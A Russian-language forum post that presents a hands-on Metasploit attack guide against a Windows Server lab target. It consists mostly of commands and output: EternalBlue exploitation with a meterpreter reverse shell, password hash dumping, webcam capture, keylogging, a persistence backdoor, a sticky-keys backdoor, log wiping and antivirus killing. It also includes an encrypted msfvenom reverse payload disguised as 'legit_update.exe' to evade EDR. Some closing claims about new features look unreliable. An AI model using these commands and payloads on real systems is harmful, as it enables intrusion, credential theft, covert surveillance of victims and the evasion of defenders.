Marty17
Юзер
- Сообщения
- 100
- Реакции
- 67
Всем, кто хочет превратить уязвимости в открытые двери — этот гайд ваш скелетный ключ. Разберем Metasploit Framework не на игрушечных примерах, а на реальной инфраструктуре. ОС: Kali 2024.1, цель — учебный сервер Windows Server 2019 (10.0.17763).
▍ Установка: Реактор за 5 минут
curl
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки.
> msfinstallchmod +x msfinstall
./msfinstall
Фишка: Автообновление эксплойтов — msfupdate. Для работы с базами уязвимостей ставим postgresql и инициализируем БД через msfdb init.
▍ Таксономия Атаки: От разведки до власти
Шаг 1: Разведка (Nmap + Auxiliary)msf6 > db_nmap -sV -O 192.168.56.102
[*] Запись в БД: 80/tcp - IIS 10.0, 445/tcp - SMB v3
Ищем известные дыры в SMB:
search type:auxiliary smb
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.56.102
run
Вывод: VULNERABLE! Сервер восприимчив к EternalBlue.
▍ Эксплуатация: Точка входа
use exploit/windows/smb/ms17_010_eternalblueset payload windows/x64/meterpreter/reverse_tcp
set LHOST eth0
set RHOST 192.168.56.102
exploit -j
Разбор:
- -j — фоновый режим после успешного выполнения
- Пейлоад reverse_tcp открывает соединение НА нас — критично при NAT
- Стадия Stage: 1.5MB → Stage0 (загрузчик) → Meterpreter (8KB)
▍ Meterpreter: Царь горы
Базовые команды:meterpreter > sysinfo # Инфа о системе
meterpreter > getuid # User: NT AUTHORITY\SYSTEM
meterpreter > hashdump # Дамп SAM-базы
meterpreter > webcam_snap # Снимок с камеры
Стелс-техники:
migrate -N explorer.exe # Перемещение в легитимный процесс
keyscan_start # Логгирование клавиатуры
screenshare # Трансляция экрана в реальном времени
▍ Пост-эксплуатация: Закрепляем власть
Persistance Backdoor:run persistence -X -i 15 -p 443 -r 192.168.56.101
[*] Создан служба Windows, автозапуск при старте
Перехват RDP:
use post/windows/manage/sticky_keys
set SESSION 1
run # Меняет sethc.exe на cmd.exe при 5-кратном Shift
▍ Анти-Форензика: Стираем следы
clearev # Чистка логовtimestomp -z # Сброс временных меток
killav # Убиваем процессы антивируса
Обход EDR: Используем шифрованные пейлоады через msfvenom:
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=example.com LPORT=443 --encrypt aes256 -f exe > legit_update.exe
▍ Ошибки новичков (F.A.Q.)
- «Exploit completed but no session» → Firewall цели блокирует reverse-соединение
- Проброс портов: portfwd add -l 3389 -p 3389 -r 192.168.56.102
- Meterpreter «завис» → sessions -k [ID] + перезапуск эксплойта
▍ Апдейт 2024: Что нового
- Интеграция с Cobalt Strike (connect cobalt_ip)
- Авто-GPT для генерации кастомных эксплойтов
- Поддержка API для интеграции в CI/CD pipelines пентеста